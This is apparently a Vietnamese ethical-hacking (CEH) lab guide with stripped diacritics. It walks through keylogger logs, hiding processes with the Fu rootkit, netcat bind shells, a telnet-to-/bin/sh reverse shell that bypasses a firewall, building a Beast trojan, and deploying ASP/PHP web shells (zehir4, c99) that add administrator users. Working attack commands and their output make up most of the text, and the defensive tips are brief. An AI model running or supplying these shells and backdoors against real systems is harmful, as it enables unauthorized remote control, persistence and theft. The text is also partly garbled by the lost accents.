i khong 10 pht ta s thy logfile c gi v nh sau: >> C:\WINDOWS\system32\notepad.exe > Chuc lop SecCEH manh khoe, va nhieu thanh dat.. > Chuc lop CEH hoc gioi >:::::::::: > ms > C:\WINDOWS\system32\mspaint.exe Theo nh trn, chng ta c th thy keyloger c th lu li hu nh ht tt c thng tin trn PC ca my nn nhn, c bit l cc thng tin nhy cm nh th tn dng, account, v.v. Ngi vit khuyn co cc bn s dng kin thc vi mc ch nghin cu, khng s dng chng trnh ny vi mc ch xu. Bi Lab 5: S dng Rootkit v xa Log file Rootkit l chng trnh lm n s hot ng ca keylogger, trojan, lm cho admin h thng kh khn trong vic pht hin. Trong bi thc hnh ta s dng Fu Rootkit n process ca keylogger ta ci bi trc, ta s dng lnh tasklist xem cc process chy trong my tnh.



Nh ta thy trn hnh, proccess ca cehkeyloger.exe c PID l 1236, by gi ta s ln process ny bng lnh fu ph 1236 v th xem li cc process bng lnh tasklist.



Ta thy keylogger bin mt khi tasklist, lc ny mun detect c chnh xc ngi admin nn s dng trng trnh antivirus, kim sot truy nhp v chy nhng chng trnh kim tra rootkit trong my nh rootkit detector.



Bi 4: TROJAN v BACKDOOR

I/ Gii thiu v Trojan v Backdoor: Trojan v Backdoor c s dng gim st my nn nhn, v l ca sau Hacker c th

vo li h thng my tnh thng qua cng kt ni(port), thng qua mi trng Web(webase). Loi s dng cng kt ni ta thng thy l netcat, beast, Donald Dick v.v. V loi s dng mi trng Webbase thng thng l r57,c99, zehir4v.v. c tnh ca Trojan kt ni port l mi ln kt ni phi m cng, v admin tng i pht hin d dng hn so vi loi Webbase(thng thng tn cng Web Server). Trong bi thc hnh, chng ta ci th cc tnh nng ca netcat, beast, c99, zehir4 v phn tch 1 don code mu trojan. II/ Cc bi thc hnh: Bi 1 S dng netcat: 1/S dng netcat kt ni shell

Trn my tnh ca nn nhn, bn khi ng netcat vo ch lng nghe, dng ty chn l (listen) v -p port xc nh s hiu cng cn lng nghe, -e yu cu netcat thi hnh 1 chng trnh khi c 1 kt ni n, thng l shell lnh cmd.exe (i vi NT) hoc bin/sh (i vi Unix).

E:\>nc -nvv -l -p 8080 -e cmd.exe listening on [any] 8080 ... connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159 sent 0, rcvd 0: unknown socket error - trn my tnh dng tn cng, bn ch vic dng netcat ni n my nn nhn trn cng nh, chng hn nh 8080 C:\>nc -nvv 172.16.84.2 8080 (UNKNOWN) [172.16.84.2] 8080 (?) open Microsoft Windows 2000 [Version 5.00.2195] Copyright 1985-1999 Microsoft Corp. E:\>cd test cd test E:\test>dir /w dir /w Volume in drive E has no label. Volume Serial Number is B465-452F Directory of E:\test [.] [..] head.log NETUSERS.EXE NetView.exe ntcrash.zip password.txt pwdump.exe 6 File(s) 262,499 bytes 2 Dir(s) 191,488,000 bytes free



C:\test>exit exit sent 20, rcvd 450: NOTSOCK

By gi chng ta c c shell v kim soat c my nn nhn.Tuy nhin, sau kt ni trn, netcat trn my nn nhn cngng lun. yu cu netcat lng nghe tr li sau mi kt ni, bn dng -L thaycho -l. Lu : -L ch c th p dng cho bn Netcat for Windows, khng p dng cho bn chy trn Linux.

2/S dng netcat kt ni shell nghch chuyn by pass Firewall: - dng telnet ni ca s netcat ang lng nghe, k a lnh t ca s ny vo lung telnet nghch chuyn, v gi kt qu vo ca s kia. V d: - trn my dng tn cng(172.16.84.1), m 2 ca s netcat ln lt lng nghe trn cng 80 v 25: + ca s Netcat (1) C:\>nc -nvv -l -p 80 listennng on [any] 80 ... connect to [172.16.84.1] from [172.16.84.2] 1055 pwd ls -la _ + ca s Netcat (2) C:\>nc -nvv -l -p 25 listening on [any] 25 ... connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056 / total 171 drwxr-xr-x 17 root root 4096 Feb 5 16:15 . drwxr-xr-x 17 root root 4096 Feb 5 16:15 .. drwxr-xr-x 2 root root 4096 Feb 5 08:55 b (?n drwxr-xr-x 3 root root 4096 Feb 5 14:19 boot drwxr-xr-x 13 root root 106496 Feb 5 14:18 dev drwxr-xr-x 37 root root 4096 Feb 5 14:23 et = ? drwxr-xr-x 6 root root 4096 Feb 5 08:58 home drwxr-xr-x 6 root root 4096 Feb 5 08:50 l (?b drwxr-xr-x 2 root root 7168 De = ? 31 1969 mnt drwxr-xr-x 4 root root 4096 Feb 5 16:18 n = ? drwxr-xr-x 2 root root 4096 Aug 23 12:03 opt dr-xr-xr-x 61 root root 0 Feb 5 09:18 pro = ? drwx------ 12 root root 4096 Feb 5 16:24 root drwxr-xr-x 2 root root 4096 Feb 5 08:55 sb (?n



drwxrwxrwt 9 root root 4096 Feb 5 16:25 tmp drwxr-xr-x 13 root root 4096 Feb 5 08:42 usr drwxr-xr-x 18 root root 4096 Feb 5 08:52 var - trn my tnh nn nhn(172.16.84.2), telnet nghch chuyn n my dng tn cng(172.16.84.1), dng /bin/sh kt xut: [root@nan_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25 /bin/sh: Trying: command not found /bin/sh: Connected: command not found /bin/sh: Escape: command not found Trying 172.16.84.1... Connected to 172.16.84.1. Escape character is '^]'. _ Telnet trn my nn nhn s chuyn tt c nhng g m chng ta g vo trong ca s Netcat (1) - cng 80 kt xut sang cho /bin/sh thi hnh. Kt qu ca /bin/sh c kt xut tr li cho my tnh dng tn cng trn ca s Netcat (2) - cng 25. Nhim v ca bn l ch cn g lnh vo ca s Netcat (1) v xem kt qu trong ca s Netcat (2). S d ti chn cng 80 v 25 v cc cng ny thng khng b firewalls hoc filters lc. Bi 2: S dng Trojan Beast v detect trojan. Mun s dng Trojan Beast, ta cn phi xy dng 1 file Server ci ln my nn nhn, sau file server ny s lng nghe nhng port c nh v t my tn cng ta s connect vo my nn nhn thng qua cng ny. Chn trojan Beast trong a CD v chy file to trojan.

Ta c th s dng thm cc tnh nng nh AV-FW kill t Firewall trn my i phng, hoc inject vo 1 file khc nh notepad.exe, explore di dng dll. Ta s dng button Save Server ti ra file server.exe v chy file my nn nhn v kim tra trn taskmanager ca my nn nhn xem Trojan thc s hot ng.



By gi ta s dng chng trnh ti my tn cng connect vo file Server chy trn my ca nn nhn.

Ta th s dng 1 s tnh nng nh l managers file download cc file mnh cn ti my nn nhn, hay bn c shutdown, reboot my nn nhn thng qua tnh nng ca tag Windows



Cch phng chng: Ngoi cch s dng cc chng trnh Anti Virus v Trojan, ta c th da v tnh cht thng thng nhng Trojan ny bt buc phi m port no ra ngoi, ta c th xem bng chng trnh Curr Port hay chng trnh fport.



Da vo thng tin Currport cung cp ta c th xa ng dn ca file cehclass.exe v xa nhng thng tin v n trong regedit, v startup v.v. Bi 3: S dng Trojan di dng Webbase Trojan dng webbase thng thng ph bin hn trong mi trng web, sau khi hacker khai thc c l hng v chim quyn s dng Web Server, hacker s li trojan di dng Webbase v thng qua Trojan ny hacker c th ra vo h thng cho nhng ln sau. c im ca loi Trojan ny l rt kh pht hin, v no chy di dng Web v s dng nhng hm truy sut h thng thng qua cc ngn ng asp, phpv.v, v vy n khng th d pht hin nh loi trojan kt ni nh netcat, beast v.v. thc hin bi lab ny trc tin ta phi ci t Web Server gm IIS v Apache.

1/Trojan di dng Web vi ngn ng ASP: Ta s dng Web Server IIS vi Trojan c vit bng ngn ng ny, ngi vit gii thiu vi cc bn 2 trojan tiu biu l cmd.asp v zehir4.asp

u tin bn ci t dch v Web IIS(vic ci t kh n gin, hc vin c th t

mnh lm phn ny), chp 2 file vo th mc www truy cp thng qua Web.



Ta nh vo lnh Dir xem thng tin cc file trong h thng, vi trojan nh trn ta c th xem c cc thng tin h thng, c th upload,download thng qua tftp, v add user vo h thng v d lnh net user hao hao /add, net Localgroup administrators hao /add . Vo link http://192.168.1.116/zehir4.asp xem v trojan webbase th 2.

Ta thy Trojan ny hng ha v tin dng hn, vic ly file,xa file hon ton thng qua web, chng ta c th d dng thao tc trn my ca nn nhn. 2/Trojan vi ngn ng PHP: Ta s dng Web server Apache vi trojan c vit bng ngn ng ny, ngi vit gii thiu n cc bn trojan tiu biu l c99. u tin bn s dng chng trnh phpeasy ci kt hp 3 gi sau apache, php, v mysql. Tuy nhin trong bi cc bn ch cn s dng php v apache. Chp cc file trojan v th mc www c th chy c cc file ny.



y l file trojan rt nguy him, n va c th download, upload file, ng thi h tr chng ta chy nhng ng dng nh perl, thc thi cc hm h thng, cung cp thng tin v nn nhn hin hnhv.v. Do tnh cht nh vy cho nn Trojan ny c hacker dng rt rng ri(ngoi ra cn c r57, phpshellv.v).